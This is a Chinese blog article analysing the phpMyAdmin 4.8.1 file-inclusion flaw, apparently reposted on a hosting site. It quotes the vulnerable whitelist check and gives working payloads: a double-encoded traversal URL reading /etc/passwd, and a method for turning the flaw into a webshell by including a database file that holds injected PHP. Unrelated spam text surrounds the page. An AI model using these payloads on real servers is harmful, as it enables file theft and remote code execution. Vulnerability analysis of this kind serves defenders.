91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

phpmyadmin 4.8.1任意文件包含的示例分析

發布時間:2021-11-12 11:25:03 來源:億速云 閱讀:133 作者:小新 欄目:安全技術

這篇文章給大家分享的是有關phpmyadmin 4.8.1任意文件包含的示例分析的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

phpmyadmin 4.8.1任意文件包含

0x00 phpmyadmin簡述

phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的數據庫管理工具,讓管理者可用Web接口管理MySQL數據庫。借由此Web接口可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優勢在于由于phpMyAdmin跟其他PHP程式一樣在網頁服務器上執行,但是您可以在任何地方使用這些程式產生的HTML頁面,也就是于遠端管理MySQL數據庫,方便的建立、修改、刪除數據庫及資料表。也可借由phpMyAdmin建立常用的php語法,方便編寫網頁時所需要的sql語法正確性。

0x01 影響版本

phpmyadmin 4.8.1
之前的版本沒有測試
注:需要登錄phpmyadmin才可利用

0x02漏洞分析

查看index.php 55~63行代碼

if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

條件為真(條件):

  1. $_REQUEST['target'] 不能為空

  2. $_REQUEST['target'] 是字符串

  3. $_REQUEST['target'] 不能以index開頭

  4. $_REQUEST['target'] 不能在$target_blacklist;而$target_blacklist = array ('import.php', 'export.php');

  5. 需要滿足Core::checkPageValidity($_REQUEST['target'])

Core::checkPageValidity($_REQUEST['target']),查看phpMyAdmin1\libraries\classes\core.php
checkPageValidity 函數具體代碼:

public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

出現問題的代碼:

$_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

在請求的鏈接中包含%253即可繞過,那可以構造的鏈接有:
db_sql.php%253/../../../../../../etc/passwd
db_sql.php可以替換成一下:

'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
        'db_import.php',
        'db_operations.php',
        'db_search.php',
        'db_routines.php',
        'export.php',
        'import.php',
        'index.php',
        'pdf_pages.php',
        'pdf_schema.php',
        'server_binlog.php',
        'server_collations.php',
        'server_databases.php',
        'server_engines.php',
        'server_export.php',
        'server_import.php',
        'server_privileges.php',
        'server_sql.php',
        'server_status.php',
        'server_status_advisor.php',
        'server_status_monitor.php',
        'server_status_queries.php',
        'server_status_variables.php',
        'server_variables.php',
        'sql.php',
        'tbl_addfield.php',
        'tbl_change.php',
        'tbl_create.php',
        'tbl_import.php',
        'tbl_indexes.php',
        'tbl_sql.php',
        'tbl_export.php',
        'tbl_operations.php',
        'tbl_structure.php',
        'tbl_relation.php',
        'tbl_replace.php',
        'tbl_row_action.php',
        'tbl_select.php',
        'tbl_zoom_select.php',
        'transformation_overview.php',
        'transformation_wrapper.php',
        'user_password.php',

phpmyadmin 4.8.1任意文件包含的示例分析

0x03通過文件包含獲取webshell

前提條件首先知道數據庫的路徑

查看當前數據庫的路徑:

show variables like 'datadir'

phpmyadmin 4.8.1任意文件包含的示例分析
我新建了一個數據庫 tt,在tt數據庫中添加一個了表,在表中插入了<?php phpinfo()?>
然后訪問:http://localhost/phpMyAdmin1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/MySQL/data/tet/tt.MYD
phpmyadmin 4.8.1任意文件包含的示例分析

感謝各位的閱讀!關于“phpmyadmin 4.8.1任意文件包含的示例分析”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

巫山县| 信宜市| 乐陵市| 石屏县| 吉林市| 漳平市| 庄河市| 普兰店市| 樟树市| 太康县| 宿州市| 阿克| 大英县| 舒城县| 陆丰市| 新营市| 福鼎市| 郯城县| 贵阳市| 亚东县| 瓦房店市| 十堰市| 陇南市| 娄烦县| 沂水县| 安陆市| 会昌县| 东辽县| 巴里| 清丰县| 龙游县| 桐乡市| 棋牌| 全州县| 禹城市| 新营市| 金堂县| 墨江| 新郑市| 黔西| 巨野县|